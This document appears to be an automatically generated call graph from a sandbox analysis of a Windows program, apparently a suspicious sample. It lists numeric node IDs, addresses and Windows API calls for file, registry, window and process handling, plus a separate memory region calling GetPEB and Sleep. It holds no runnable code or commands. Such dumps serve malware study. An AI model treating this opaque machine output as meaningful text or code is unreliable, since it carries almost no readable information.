83d752 99627->99629 99630 838d68 __wfsopen 58 API calls 99628->99630 99632 838d68 __wfsopen 58 API calls 99629->99632 99633 83d71b 99630->99633 99631->99600 99634 83d75a 99632->99634 99633->99600 99635 838ff6 __wfsopen 9 API calls 99634->99635 99635->99633 99636->99606 99637->99607 99700 841b90 99638->99700 99641 8148f7 99706 817eec 99641->99706 99642 8148da 99643 817d2c 59 API calls 99642->99643 99645 8148e6 99643->99645 99702 817886 99645->99702 99648 8309d5 99649 841b90 __write_nolock 99648->99649 99650 8309e2 GetLongPathNameW 99649->99650 99651 817d2c 59 API calls 99650->99651 99652 81741d 99651->99652 99653 81716b 99652->99653 99654 8177c7 59 API calls 99653->99654 99655 81717d 99654->99655 99656 8148ae 60 API calls 99655->99656 99657 817188 99656->99657 99658 817193 99657->99658 99659 84ecae 99657->99659 99660 813f84 59 API calls 99658->99660 99663 84ecc8 99659->99663 99720 817a68 61 API calls 99659->99720 99662 81719f 99660->99662 99714 8134c2 99662->99714 99665 8171b2 Mailbox 99665->98558 99667 814f3d 136 API calls 99666->99667 99668 8169ef 99667->99668 99669 84e45a 99668->99669 99670 814f3d 136 API calls 99668->99670 99671 8797e5 122 API calls 99669->99671 99672 816a03 99670->99672 99673 84e46f 99671->99673 99672->99669 99674 816a0b 99672->99674 99675 84e490 99673->99675 99676 84e473 99673->99676 99678 816a17 99674->99678 99679 84e47b 99674->99679 99677 830ff6 Mailbox 59 API calls 99675->99677 99680 814faa 84 API calls 99676->99680 99696 84e4d5 Mailbox 99677->99696 99721 816bec 99678->99721 99837 874534 90 API calls _wprintf 99679->99837 99680->99679 99684 84e489 99684->99675 99685 84e689 99686 832f95 _free 58 API calls 99685->99686 99687 84e691 99686->99687 99688 814faa 84 API calls 99687->99688 99693 84e69a 99688->99693 99692 832f95 _free 58 API calls 99692->99693 99693->99692 99694 814faa 84 API calls 99693->99694 99839 86fcb1 89 API calls 4 library calls 99693->99839 99694->99693 99696->99685 99696->99693 99697 817f41 59 API calls 99696->99697 99814 86fc4d 99696->99814 99817 877621 99696->99817 99823 81766f 99696->99823 99831 8174bd 99696->99831 99838 86fb6e 61 API calls 2 library calls 99696->99838 99697->99696 99701 8148bb GetFullPathNameW 99700->99701 99701->99641 99701->99642 99703 817894 99702->99703 99710 817e8c 99703->99710 99705 8148f2 99705->99648 99707 817f06 99706->99707 99709 817ef9 99706->99709 99708 830ff6 Mailbox 59 API calls 99707->99708 99708->99709 99709->99645 99711 817e9a 99710->99711 99713 817ea3 _memmove 99710->99713 99712 817faf 59 API calls 99711->99712 99711->99713 99712->99713 99713->99705 99715 8134d4 99714->99715 99719 8134f3 _memmove 99714->99719 99718 830ff6 Mailbox 59 API calls 99715->99718 99716 830ff6 Mailbox 59 API calls 99717 81350a 99716->99717 99717->99665 99718->99719 99719->99716 99720->99659 99722 84e847 99721->99722 99723 816c15 99721->99723 99931 86fcb1 89 API calls 4 library calls 99722->99931 99845 815906 60 API calls Mailbox 99723->99845 99726 84e85a 99932 86fcb1 89 API calls 4 library calls 99726->99932 99727 816c37 99846 815956 99727->99846 99730 816c54 99732 8177c7 59 API calls 99730->99732 99734 816c60 99732->99734 99733 84e876 99736 816cc1 99733->99736 99859 830b9b 60 API calls __write_nolock 99734->99859 99738 84e889 99736->99738 99739 816ccf 99736->99739 99737 816c6c 99740 8177c7 59 API calls 99737->99740 99741 815dcf CloseHandle 99738->99741 99742 8177c7 59 API calls 99739->99742 99744 816c78 99740->99744 99745 84e895 99741->99745 99743 816cd8 99742->99743 99746 8177c7 59 API calls 99743->99746 99747 8148ae 60 API calls 99744->99747 99748 814f3d 136 API calls 99745->99748 99749 816ce1 99746->99749 99750 816c86 99747->99750 99751 84e8b1 99748->99751 99869 8146f9 99749->99869 99860 8159b0 ReadFile SetFilePointerEx 99750->99860 99752 84e8da 99751->99752 99755 8797e5 122 API calls 99751->99755 99933 86fcb1 89 API calls 4 library calls 99752->99933 99759 84e8cd 99755->99759 99756 816cf8 99760 817c8e 59 API calls 99756->99760 99758 816cb2 99861 815c4e 99758->99861 99763 84e8d5 99759->99763 99764 84e8f6 99759->99764 99765 816d09 SetCurrentDirectoryW 99760->99765 99761 84e8f1 99793 816e6c Mailbox 99761->99793 99766 814faa 84 API calls 99763->99766 99767 814faa 84 API calls 99764->99767 99770 816d1c Mailbox 99765->99770 99766->99752 99768 84e8fb 99767->99768 99769 830ff6 Mailbox 59 API calls 99768->99769 99775 84e92f 99769->99775 99772 830ff6 Mailbox 59 API calls 99770->99772 99774 816d2f 99772->99774 99773 813bcd 99773->98420 99773->98442 99776 81538e 59 API calls 99774->99776 99777 81766f 59 API calls 99775->99777 99790 816d3a Mailbox __wsetenvp 99776->99790 99783 84e978 Mailbox 99777->99783 99778 816e47 99780 84eb69 99936 877581 59 API calls Mailbox 99780->99936 99783->99780 99795 81766f 59 API calls 99783->99795 99804 86fc4d 59 API calls 99783->99804 99805 817f41 59 API calls 99783->99805 99806 877621 59 API calls 99783->99806 99809 84ebbb 99783->99809 99934 86fb6e 61 API calls 2 library calls 99783->99934 99935 817373 59 API calls Mailbox 99783->99935 99786 84eb8b 99937 87f835 59 API calls 2 library calls 99786->99937 99789 84eb98 99791 832f95 _free 58 API calls 99789->99791 99790->99778 99797 84ebfa 99790->99797 99799 817f41 59 API calls 99790->99799 99802 84ec02 99790->99802 99920 8159cd 67 API calls _wcscpy 99790->99920 99921 8170bd GetStringTypeW 99790->99921 99791->99793 99840 815934 99793->99840 99795->99783 99799->99790 99804->99783 99805->99783 99806->99783 99938 86fcb1 89 API calls 4 library calls 99809->99938 99811 84ebd4 99812 832f95 _free 58 API calls 99811->99812 99813 84ebe7 99812->99813 99813->99793 99815 830ff6 Mailbox 59 API calls 99814->99815 99816 86fc7d _memmove 99815->99816 99816->99696 99818 87762c 99817->99818 99819 830ff6 Mailbox 59 API calls 99818->99819 99820 877643 99819->99820 99821 877652 99820->99821 99822 817f41 59 API calls 99820->99822 99821->99696 99822->99821 99824 81770f 99823->99824 99828 817682 _memmove 99823->99828 99826 830ff6 Mailbox 59 API calls 99824->99826 99825 830ff6 Mailbox 59 API calls 99827 817689 99825->99827 99826->99828 99829 8176b2 99827->99829 99830 830ff6 Mailbox 59 API calls 99827->99830 99828->99825 99829->99696 99830->99829 99832 8174d0 99831->99832 99835 81757e 99831->99835 99833 830ff6 Mailbox 59 API calls 99832->99833 99834 817502 99832->99834 99833->99834 99834->99835 99836 830ff6 59 API calls Mailbox 99834->99836 99835->99696 99836->99834 99837->99684 99838->99696 99839->99693 99841 815dcf CloseHandle 99840->99841 99842 81593c Mailbox 99841->99842 99843 815dcf CloseHandle 99842->99843 99844 81594b 99843->99844 99844->99773 99845->99727 99847 815dcf CloseHandle 99846->99847 99848 815962 99847->99848 99941 815df9 99848->99941 99850 815981 99854 8159a4 99850->99854 99949 815770 99850->99949 99852 815993 99966 8153db SetFilePointerEx SetFilePointerEx 99852->99966 99854->99726 99854->99730 99855 84e030 99967 873696 SetFilePointerEx SetFilePointerEx WriteFile 99855->99967 99856 81599a 99856->99854 99856->99855 99858 84e060 99858->99854 99859->99737 99860->99758 99868 815c68 99861->99868 99862 815cef SetFilePointerEx 99980 815dae SetFilePointerEx 99862->99980 99865 84e151 99981 815dae SetFilePointerEx 99865->99981 99866 815cc3 99866->99736 99867 84e16b 99868->99862 99868->99865 99868->99866 99870 8177c7 59 API calls 99869->99870 99871 81470f 99870->99871 99872 8177c7 59 API calls 99871->99872 99873 814717 99872->99873 99874 8177c7 59 API calls 99873->99874 99875 81471f 99874->99875 99876 8177c7 59 API calls 99875->99876 99877 814727 99876->99877 99878 81475b 99877->99878 99879 84d8fb 99877->99879 99880 8179ab 59 API calls 99878->99880 99881 8181a7 59 API calls 99879->99881 99882 814769 99880->99882 99883 84d904 99881->99883 99884 817e8c 59 API calls 99882->99884 99885 817eec 59 API calls 99883->99885 99886 814773 99884->99886 99887 81479e 99885->99887 99886->99887 99888 8179ab 59 API calls 99886->99888 99891 8147bd 99887->99891 99901 84d924 99887->99901 99906 8147de 99887->99906 99890 814794 99888->99890 99894 817e8c 59 API calls 99890->99894 99892 817b52 59 API calls 99891->99892 99896 8147c7 99892->99896 99893 8147ef 99897 814801 99893->99897 99899 8181a7 59 API calls 99893->99899 99894->99887 99895 84d9f4 99898 817d2c 59 API calls 99895->99898 99904 8179ab 59 API calls 99896->99904 99896->99906 99900 814811 99897->99900 99905 8181a7 59 API calls 99897->99905 99915 84d9b1 99898->99915 99899->99897 99903 814818 99900->99903 99907 8181a7 59 API calls 99900->99907 99901->99895 99902 84d9dd 99901->99902 99913 84d95b 99901->99913 99902->99895 99910 84d9c8 99902->99910 99908 8181a7 59 API calls 99903->99908 99917 81481f Mailbox 99903->99917 99904->99906 99905->99900 99982 8179ab 99906->99982 99907->99903 99908->99917 99909 84d9b9 99911 817d2c 59 API calls 99909->99911 99912 817d2c 59 API calls 99910->99912 99911->99915 99912->99915 99913->99909 99918 84d9a4 99913->99918 99914 817b52 59 API calls 99914->99915 99915->99906 99915->99914 99995 817a84 59 API calls 2 library calls 99915->99995 99917->99756 99919 817d2c 59 API calls 99918->99919 99919->99915 99920->99790 99921->99790 99931->99726 99932->99733 99933->99761 99934->99783 99935->99783 99936->99786 99937->99789 99938->99811 99942 815e12 CreateFileW 99941->99942 99943 84e181 99941->99943 99945 815e34 99942->99945 99944 84e187 CreateFileW 99943->99944 99943->99945 99944->99945 99946 84e1ad 99944->99946 99945->99850 99947 815c4e 2 API calls 99946->99947 99948 84e1b8 99947->99948 99948->99945 99950 84dfce 99949->99950 99951 81578b 99949->99951 99965 81581a 99950->99965 99974 815e3f 99950->99974 99952 815c4e 2 API calls 99951->99952 99951->99965 99953 8157ad 99952->99953 99954 81538e 59 API calls 99953->99954 99956 8157b7 99954->99956 99956->99950 99957 8157c4 99956->99957 99958 830ff6 Mailbox 59 API calls 99957->99958 99959 8157cf 99958->99959 99960 81538e 59 API calls 99959->99960 99961 8157da 99960->99961 99968 815d20 99961->99968 99964 815c4e 2 API calls 99964->99965 99965->99852 99966->99856 99967->99858 99969 815d93 99968->99969 99973 815d2e 99968->99973 99979 815dae SetFilePointerEx 99969->99979 99971 815807 99971->99964 99972 815d66 ReadFile 99972->99971 99972->99973 99973->99971 99973->99972 99975 815c4e 2 API calls 99974->99975 99976 815e60 99975->99976 99977 815c4e 2 API calls 99976->99977 99978 815e74 99977->99978 99978->99965 99979->99973 99980->99866 99981->99867 99983 817a17 99982->99983 99984 8179ba 99982->99984 99985 817e8c 59 API calls 99983->99985 99984->99983 99986 8179c5 99984->99986 99991 8179e8 _memmove 99985->99991 99987 8179e0 99986->99987 99988 84ef32 99986->99988 99996 818087 99987->99996 100000 818189 99988->100000 99991->99893 99992 84ef3c 99993 830ff6 Mailbox 59 API calls 99992->99993 99994 84ef5c 99993->99994 99995->99915 99997 81809f 99996->99997 99999 818099 99996->99999 99998 830ff6 Mailbox 59 API calls 99997->99998 99998->99999 99999->99991 100001 830ff6 Mailbox 59 API calls 100000->100001 100002 818193 100001->100002 100002->99992 100004 816ef5 100003->100004 100005 817009 100003->100005 100004->100005 100006 830ff6 Mailbox 59 API calls 100004->100006 100005->98573 100008 816f1c 100006->100008 100007 830ff6 Mailbox 59 API calls 100013 816f91 100007->100013 100008->100007 100011 8174bd 59 API calls 100011->100013 100012 81766f 59 API calls 100012->100013 100013->100005 100013->100011 100013->100012 100016 8163a0 100013->100016 100041 866ac9 59 API calls Mailbox 100013->100041 100014->98576 100015->98578 100042 817b76 100016->100042 100018 8165ca 100023 817eec 59 API calls 100037 8163c5 100023->100037 100024 81766f 59 API calls 100024->100037 100025 84e41f 100032 8168f9 _memmove 100052 86fdba 91 API calls 4 library calls 100032->100052 100033 84e3bb 100034 818189 59 API calls 100033->100034 100037->100018 100037->100023 100037->100024 100037->100025 100037->100032 100037->100033 100038 817faf 59 API calls 100037->100038 100047 8160cc 60 API calls 100037->100047 100048 815ea1 59 API calls Mailbox 100037->100048 100049 815fd2 60 API calls 100037->100049 100050 817a84 59 API calls 2 library calls 100037->100050 100039 81659b CharUpperBuffW 100038->100039 100039->100037 100041->100013 100043 830ff6 Mailbox 59 API calls 100042->100043 100044 817b9b 100043->100044 100045 818189 59 API calls 100044->100045 100046 817baa 100045->100046 100046->100037 100047->100037 100048->100037 100049->100037 100050->100037 100053->98591 100054->98592 100600 813633 100601 81366a 100600->100601 100602 8136e7 100601->100602 100603 813688 100601->100603 100644 8136e5 100601->100644 100605 84d31c 100602->100605 100606 8136ed 100602->100606 100607 813695 100603->100607 100608 81375d PostQuitMessage 100603->100608 100604 8136ca DefWindowProcW 100610 8136d8 100604->100610 100650 8211d0 10 API calls Mailbox 100605->100650 100611 8136f2 100606->100611 100612 813715 SetTimer RegisterWindowMessageW 100606->100612 100613 8136a0 100607->100613 100614 84d38f 100607->100614 100608->100610 100620 8136f9 KillTimer 100611->100620 100621 84d2bf 100611->100621 100612->100610 100615 81373e CreatePopupMenu 100612->100615 100616 813767 100613->100616 100617 8136a8 100613->100617 100654 872a16 71 API calls _memset 100614->100654 100615->100610 100648 814531 64 API calls _memset 100616->100648 100622 84d374 100617->100622 100623 8136b3 100617->100623 100619 84d343 100651 8211f3 341 API calls Mailbox 100619->100651 100645 8144cb Shell_NotifyIconW _memset 100620->100645 100627 84d2c4 100621->100627 100628 84d2f8 MoveWindow 100621->100628 100622->100604 100653 86817e 59 API calls Mailbox 100622->100653 100630 81374b 100623->100630 100631 8136be 100623->100631 100624 84d3a1 100624->100604 100624->100610 100633 84d2e7 SetFocus 100627->100633 100634 84d2c8 100627->100634 100628->100610 100647 8145df 81 API calls _memset 100630->100647 100631->100604 100652 8144cb Shell_NotifyIconW _memset 100631->100652 100632 81375b 100632->100610 100633->100610 100634->100631 100637 84d2d1 100634->100637 100635 81370c 100646 813114 DeleteObject DestroyWindow Mailbox 100635->100646 100649 8211d0 10 API calls Mailbox 100637->100649 100642 84d368 100643 8143db 68 API calls 100642->100643 100643->100644 100644->100604 100645->100635 100646->100610 100647->100632 100648->100632 100649->100610 100650->100619 100651->100631 100652->100642 100653->100644 100654->100624 100655 84ff06 100656 84ff10 100655->100656 100695 81ac90 Mailbox _memmove 100655->100695 100904 818e34 59 API calls Mailbox 100656->100904 100660 830ff6 59 API calls Mailbox 100679 81a097 Mailbox 100660->100679 100664 81b5d5 100666 8181a7 59 API calls 100664->100666 100681 81a1b7 100666->100681 100667 85047f 100908 87a0b5 89 API calls 4 library calls 100667->100908 100668 81b5da 100913 87a0b5 89 API calls 4 library calls 100668->100913 100669 817f41 59 API calls 100669->100695 100671 8177c7 59 API calls 100671->100679 100673 8181a7 59 API calls 100673->100679 100674 85048e 100675 867405 59 API calls 100675->100679 100677 832f80 67 API calls __cinit 100677->100679 100678 8666f4 Mailbox 59 API calls 100678->100681 100679->100660 100679->100664 100679->100667 100679->100668 100679->100671 100679->100673 100679->100675 100679->100677 100680 850e00 100679->100680 100679->100681 100684 81a6ba 100679->100684 100899 81ca20 341 API calls 2 library calls 100679->100899 100900 81ba60 60 API calls Mailbox 100679->100900 100912 87a0b5 89 API calls 4 library calls 100680->100912 100683 88bf80 341 API calls 100683->100695 100911 87a0b5 89 API calls 4 library calls 100684->100911 100686 81b416 100903 81f803 341 API calls 100686->100903 100688 81a000 341 API calls 100688->100695 100689 850c94 100690 819df0 Mailbox 59 API calls 100689->100690 100693 850c86 100690->100693 100691 850ca2 100910 87a0b5 89 API calls 4 library calls 100691->100910 100693->100678 100693->100681 100694 81b37c 100901 819e9c 60 API calls Mailbox 100694->100901 100695->100669 100695->100679 100695->100681 100695->100683 100695->100686 100695->100688 100695->100689 100695->100691 100695->100694 100696 830ff6 59 API calls Mailbox 100695->100696 100701 81b685 100695->100701 100704 81ade2 Mailbox 100695->100704 100858 88c5f4 100695->100858 100890 877be0 100695->100890 100896 8666f4 100695->100896 100905 867405 59 API calls 100695->100905 100906 88c4a7 85 API calls 2 library calls 100695->100906 100696->100695 100698 81b38d 100902 819e9c 60 API calls Mailbox 100698->100902 100909 87a0b5 89 API calls 4 library calls 100701->100909 100703 819df0 Mailbox 59 API calls 100703->100704 100704->100681 100704->100693 100704->100701 100704->100703 100705 8500e0 VariantClear 100704->100705 100712 87d2e6 100704->100712 100759 8923c9 100704->100759 100797 88474d 100704->100797 100806 822123 100704->100806 100846 88e237 100704->100846 100849 884583 100704->100849 100907 867405 59 API calls 100704->100907 100705->100704 100713 87d310 100712->100713 100714 87d305 100712->100714 100716 87d3ea Mailbox 100713->100716 100719 8177c7 59 API calls 100713->100719 100914 819c9c 59 API calls 100714->100914 100717 830ff6 Mailbox 59 API calls 100716->100717 100755 87d3f3 Mailbox 100716->100755 100718 87d433 100717->100718 100721 87d43f 100718->100721 100917 815906 60 API calls Mailbox 100718->100917 100720 87d334 100719->100720 100722 8177c7 59 API calls 100720->100722 100724 819997 84 API calls 100721->100724 100725 87d33d 100722->100725 100726 87d457 100724->100726 100727 819997 84 API calls 100725->100727 100728 815956 67 API calls 100726->100728 100729 87d349 100727->100729 100730 87d466 100728->100730 100731 8146f9 59 API calls 100729->100731 100732 87d49e 100730->100732 100733 87d46a GetLastError 100730->100733 100734 87d35e 100731->100734 100737 87d500 100732->100737 100738 87d4c9 100732->100738 100735 87d483 100733->100735 100736 817c8e 59 API calls 100734->100736 100735->100755 100918 815a1a CloseHandle 100735->100918 100739 87d391 100736->100739 100742 830ff6 Mailbox 59 API calls 100737->100742 100740 830ff6 Mailbox 59 API calls 100738->100740 100741 87d3e3 100739->100741 100746 873e73 3 API calls 100739->100746 100743 87d4ce 100740->100743 100916 819c9c 59 API calls 100741->100916 100747 87d505 100742->100747 100748 87d4df 100743->100748 100750 8177c7 59 API calls 100743->100750 100749 87d3a1 100746->100749 100752 8177c7 59 API calls 100747->100752 100747->100755 100919 87f835 59 API calls 2 library calls 100748->100919 100749->100741 100751 87d3a5 100749->100751 100750->100748 100754 817f41 59 API calls 100751->100754 100752->100755 100756 87d3b2 100754->100756 100755->100704 100915 873c66 63 API calls Mailbox 100756->100915 100758 87d3bb Mailbox 100758->100741 100760 8177c7 59 API calls 100759->100760 100761 8923e0 100760->100761 100762 819997 84 API calls 100761->100762 100763 8923ef 100762->100763 100764 817b76 59 API calls 100763->100764 100765 892402 100764->100765 100766 819997 84 API calls 100765->100766 100767 89240f 100766->100767 100768 892429 100767->100768 100769 89249d 100767->100769 100939 819c9c 59 API calls 100768->100939 100771 819997 84 API calls 100769->100771 100773 8924a2 100771->100773 100772 89242e 100774 89248c 100772->100774 100778 892445 100772->100778 100775 8924ce 100773->100775 100776 8924b0 100773->100776 100940 819bf8 100774->100940 100783 8924e3 100775->100783 100953 819c9c 59 API calls 100775->100953 100779 819bf8 59 API calls 100776->100779 100780 8179ab 59 API calls 100778->100780 100796 892499 Mailbox 100779->100796 100782 892452 100780->100782 100787 817c8e 59 API calls 100782->100787 100788 8924f8 100783->100788 100954 819c9c 59 API calls 100783->100954 100785 8180d7 59 API calls 100786 892512 100785->100786 100920 86f8f2 100786->100920 100790 892460 100787->100790 100788->100785 100791 8179ab 59 API calls 100790->100791 100792 892479 100791->100792 100793 817c8e 59 API calls 100792->100793 100795 892487 100793->100795 100955 819b9c 59 API calls Mailbox 100795->100955 100796->100704 100798 819997 84 API calls 100797->100798 100799 884787 100798->100799 100800 8163a0 94 API calls 100799->100800 100801 884797 100800->100801 100802 8847bc 100801->100802 100803 81a000 341 API calls 100801->100803 100804 819bf8 59 API calls 100802->100804 100805 8847c0 100802->100805 100803->100802 100804->100805 100805->100704 100807 819bf8 59 API calls 100806->100807 100808 82213b 100807->100808 100810 830ff6 Mailbox 59 API calls 100808->100810 100813 8569af 100808->100813 100811 822154 100810->100811 100814 822164 100811->100814 100971 815906 60 API calls Mailbox 100811->100971 100812 822189 100821 822196 100812->100821 100976 819c9c 59 API calls 100812->100976 100813->100812 100975 87f7df 59 API calls 100813->100975 100816 819997 84 API calls 100814->100816 100818 822172 100816->100818 100820 815956 67 API calls 100818->100820 100819 8569f7 100819->100821 100822 8569ff 100819->100822 100823 822181 100820->100823 100824 815e3f 2 API calls 100821->100824 100977 819c9c 59 API calls 100822->100977 100823->100812 100823->100813 100974 815a1a CloseHandle 100823->100974 100827 82219d 100824->100827 100828 856a11 100827->100828 100829 8221b7 100827->100829 100831 830ff6 Mailbox 59 API calls 100828->100831 100830 8177c7 59 API calls 100829->100830 100832 8221bf 100830->100832 100833 856a17 100831->100833 100956 8156d2 100832->100956 100835 856a2b 100833->100835 100978 8159b0 ReadFile SetFilePointerEx 100833->100978 100840 856a2f _memmove 100835->100840 100979 87794e 59 API calls 2 library calls 100835->100979 100837 8221ce 100837->100840 100972 819b9c 59 API calls Mailbox 100837->100972 100841 8221e2 Mailbox 100842 82221c 100841->100842 100843 815dcf CloseHandle 100841->100843 100842->100704 100844 822210 100843->100844 100844->100842 100973 815a1a CloseHandle 100844->100973 100847 88cdf1 130 API calls 100846->100847 100848 88e247 100847->100848 100848->100704 100850 830ff6 Mailbox 59 API calls 100849->100850 100851 884594 100850->100851 100852 81538e 59 API calls 100851->100852 100853 88459e 100852->100853 100854 819997 84 API calls 100853->100854 100855 8845b5 GetEnvironmentVariableW 100854->100855 101003 877738 59 API calls Mailbox 100855->101003 100857 8845d2 100857->100704 100859 8177c7 59 API calls 100858->100859 100860 88c608 100859->100860 100861 8177c7 59 API calls 100860->100861 100862 88c610 100861->100862 100863 8177c7 59 API calls 100862->100863 100864 88c618 100863->100864 100865 819997 84 API calls 100864->100865 100889 88c626 100865->100889 100866 817d2c 59 API calls 100866->100889 100867 88c80f 100868 88c83c Mailbox 100867->100868 101006 819b9c 59 API calls Mailbox 100867->101006 100868->100695 100869 88c7f6 100872 817e0b 59 API calls 100869->100872 100871 88c811 100874 817e0b 59 API calls 100871->100874 100876 88c803 100872->100876 100873 817a84 59 API calls 100873->100889 100878 88c820 100874->100878 100875 8181a7 59 API calls 100875->100889 100877 817c8e 59 API calls 100876->100877 100877->100867 100880 817c8e 59 API calls 100878->100880 100879 817faf 59 API calls 100882 88c6bd CharUpperBuffW 100879->100882 100880->100867 100881 817faf 59 API calls 100883 88c77d CharUpperBuffW 100881->100883 101004 81859a 68 API calls 100882->101004 101005 81c707 69 API calls 2 library calls 100883->101005 100886 819997 84 API calls 100886->100889 100887 817e0b 59 API calls 100887->100889 100888 817c8e 59 API calls 100888->100889 100889->100866 100889->100867 100889->100868 100889->100869 100889->100871 100889->100873 100889->100875 100889->100879 100889->100881 100889->100886 100889->100887 100889->100888 100891 877bec 100890->100891 100892 830ff6 Mailbox 59 API calls 100891->100892 100893 877bfa 100892->100893 100894 8177c7 59 API calls 100893->100894 100895 877c08 100893->100895 100894->100895 100895->100695 101007 866636 100896->101007 100898 866702 100898->100695 100899->100679 100900->100679 100901->100698 100902->100686 100903->100701 100904->100695 100905->100695 100906->100695 100907->100704 100908->100674 100909->100693 100910->100693 100911->100681 100912->100668 100913->100681 100914->100713 100915->100758 100916->100716 100917->100721 100918->100755 100919->100755 100921 8177c7 59 API calls 100920->100921 100922 86f905 100921->100922 100923 817b76 59 API calls 100922->100923 100924 86f919 100923->100924 100925 86f658 61 API calls 100924->100925 100935 86f93b 100924->100935 100927 86f935 100925->100927 100926 86f658 61 API calls 100926->100935 100928 8179ab 59 API calls 100927->100928 100927->100935 100928->100935 100929 86f9b5 100931 8179ab 59 API calls 100929->100931 100930 8179ab 59 API calls 100930->100935 100932 86f9ce 100931->100932 100934 817c8e 59 API calls 100932->100934 100933 817c8e 59 API calls 100933->100935 100936 86f9da 100934->100936 100935->100926 100935->100929 100935->100930 100935->100933 100937 8180d7 59 API calls 100936->100937 100938 86f9e9 Mailbox 100936->100938 100937->100938 100938->100795 100939->100772 100941 819c08 100940->100941 100942 84fbff 100940->100942 100946 830ff6 Mailbox 59 API calls 100941->100946 100943 84fc10 100942->100943 100945 817d2c 59 API calls 100942->100945 100944 817eec 59 API calls 100943->100944 100948 84fc1a 100944->100948 100945->100943 100947 819c1b 100946->100947 100947->100948 100949 819c26 100947->100949 100950 819c34 100948->100950 100951 8177c7 59 API calls 100948->100951 100949->100950 100952 817f41 59 API calls 100949->100952 100950->100796 100951->100950 100952->100950 100953->100783 100954->100788 100955->100796 100957 815702 100956->100957 100958 8156dd 100956->100958 100959 817eec 59 API calls 100957->100959 100958->100957 100960 8156ec 100958->100960 100963 87349a 100959->100963 100982 815c18 100960->100982 100961 8734c9 100961->100837 100963->100961 100980 873436 ReadFile SetFilePointerEx 100963->100980 100981 817a84 59 API calls 2 library calls 100963->100981 100970 8735d8 Mailbox 100970->100837 100971->100814 100972->100841 100973->100842 100974->100813 100975->100813 100976->100819 100977->100827 100978->100835 100979->100840 100980->100963 100981->100963 100983 830ff6 Mailbox 59 API calls 100982->100983 100984 815c2b 100983->100984 100985 830ff6 Mailbox 59 API calls 100984->100985 100986 815c37 100985->100986 100987 815632 100986->100987 100994 815a2f 100987->100994 100989 815674 100989->100970 100993 81793a 61 API calls Mailbox 100989->100993 100990 815d20 2 API calls 100991 815643 100990->100991 100991->100989 100991->100990 101001 815bda 59 API calls 2 library calls 100991->101001 100993->100970 100995 84e065 100994->100995 100996 815a40 100994->100996 101002 866443 59 API calls Mailbox 100995->101002 100996->100991 100998 84e06f 100999 830ff6 Mailbox 59 API calls 100998->100999 101000 84e07b 100999->101000 101001->100991 101002->100998 101003->100857 101004->100889 101005->100889 101006->100868 101008 866641 101007->101008 101009 86665e 101007->101009 101008->101009 101011 866621 59 API calls Mailbox 101008->101011 101009->100898 101011->101008 101012 850226 101013 81ade2 Mailbox 101012->101013 101015 850c86 101013->101015 101017 850c8f 101013->101017 101018 819df0 Mailbox 59 API calls 101013->101018 101019 8500e0 VariantClear 101013->101019 101020 81b6c1 101013->101020 101022 8923c9 87 API calls 101013->101022 101023 87d2e6 101 API calls 101013->101023 101024 822123 95 API calls 101013->101024 101025 88474d 341 API calls 101013->101025 101026 884583 85 API calls 101013->101026 101027 88e237 130 API calls 101013->101027 101028 867405 59 API calls 101013->101028 101016 8666f4 Mailbox 59 API calls 101015->101016 101016->101017 101018->101013 101019->101013 101029 87a0b5 89 API calls 4 library calls 101020->101029 101022->101013 101023->101013 101024->101013 101025->101013 101026->101013 101027->101013 101028->101013 101029->101015 101030 811055 101035 812649 101030->101035 101033 832f80 __cinit 67 API calls 101034 811064 101033->101034 101036 8177c7 59 API calls 101035->101036 101037 8126b7 101036->101037 101042 813582 101037->101042 101040 812754 101041 81105a 101040->101041 101045 813416 59 API calls 2 library calls 101040->101045 101041->101033 101046 8135b0 101042->101046 101045->101040 101047 8135bd 101046->101047 101048 8135a1 101046->101048 101047->101048 101049 8135c4 RegOpenKeyExW 101047->101049 101048->101040 101049->101048 101050 8135de RegQueryValueExW 101049->101050 101051 813614 RegCloseKey 101050->101051 101052 8135ff 101050->101052 101051->101048 101052->101051 101053 24423b0 101067 2440000 101053->101067 101055 244243b 101070 24422a0 101055->101070 101073 2443460 GetPEB 101067->101073 101069 244068b 101069->101055 101071 24422a9 Sleep 101070->101071 101072 24422b7 101071->101072 101074 244348a 101073->101074 101074->101069 101075 811016 101080 814ad2 101075->101080 101078 832f80 __cinit 67 API calls 101079 811025 101078->101079 101081 830ff6 Mailbox 59 API calls 101080->101081 101082 814ada 101081->101082 101083 81101b 101082->101083 101087 814a94 101082->101087 101083->101078 101088 814aaf 101087->101088 101089 814a9d 101087->101089 101091 814afe 101088->101091 101090 832f80 __cinit 67 API calls 101089->101090 101090->101088 101092 8177c7 59 API calls 101091->101092 101093 814b16 GetVersionExW 101092->101093 101094 817d2c 59 API calls 101093->101094 101095 814b59 101094->101095 101096 817e8c 59 API calls 101095->101096 101105 814b86 101095->101105 101097 814b7a 101096->101097 101098 817886 59 API calls 101097->101098 101098->101105 101099 814bf1 GetCurrentProcess IsWow64Process 101100 814c0a 101099->101100 101101 814c20 101100->101101 101102 814c89 GetSystemInfo 101100->101102 101115 814c95 101101->101115 101104 814c56 101102->101104 101103 84dc8d 101104->101083 101105->101099 101105->101103 101108 814c32 101110 814c95 2 API calls 101108->101110 101109 814c7d GetSystemInfo 101111 814c47 101109->101111 101112 814c3a GetNativeSystemInfo 101110->101112 101111->101104 101113 814c4d FreeLibrary 101111->101113 101112->101111 101113->101104 101116 814c2e 101115->101116 101117 814c9e LoadLibraryA 101115->101117 101116->101108 101116->101109 101117->101116 101118 814caf GetProcAddress 101117->101118 101118->101116 101119 811066 101124 81f8cf 101119->101124 101121 81106c 101122 832f80 __cinit 67 API calls 101121->101122 101123 811076 101122->101123 101125 81f8f0 101124->101125 101157 830143 101125->101157 101129 81f937 101130 8177c7 59 API calls 101129->101130 101131 81f941 101130->101131 101132 8177c7 59 API calls 101131->101132 101133 81f94b 101132->101133 101134 8177c7 59 API calls 101133->101134 101135 81f955 101134->101135 101136 8177c7 59 API calls 101135->101136 101137 81f993 101136->101137 101138 8177c7 59 API calls 101137->101138 101139 81fa5e 101138->101139 101167 8260e7 101139->101167 101143 81fa90 101144 8177c7 59 API calls 101143->101144 101145 81fa9a 101144->101145 101195 82ffde 101145->101195 101147 81fae1 101148 81faf1 GetStdHandle 101147->101148 101149 8549d5 101148->101149 101150 81fb3d 101148->101150 101149->101150 101152 8549de 101149->101152 101151 81fb45 OleInitialize 101150->101151 101151->101121 101202 876dda 64 API calls Mailbox 101152->101202 101154 8549e5 101203 8774a9 CreateThread 101154->101203 101156 8549f1 CloseHandle 101156->101151 101204 83021c 101157->101204 101160 83021c 59 API calls 101161 830185 101160->101161 101162 8177c7 59 API calls 101161->101162 101163 830191 101162->101163 101164 817d2c 59 API calls 101163->101164 101165 81f8f6 101164->101165 